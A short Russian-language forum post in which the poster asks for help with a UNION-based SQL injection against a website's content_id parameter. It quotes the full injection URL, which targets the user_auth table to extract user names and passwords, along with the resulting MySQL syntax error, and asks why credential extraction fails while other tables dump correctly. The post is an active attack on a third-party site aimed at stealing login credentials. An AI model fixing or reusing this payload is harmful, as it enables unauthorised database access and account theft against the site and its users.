You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from user_auth limit 0,1--' at line 1
Помогите плз!
нашел в базе таблицы:
user_auth
emails
clients
при попытке вывести данные из user_auth , вылетает ошибка
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_n ame,user_password))+from+user_auth+limit+0,1--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from user_auth limit 0,1--' at line 1
а из других таблиц все нормально выводится
в чем может быть проблема?????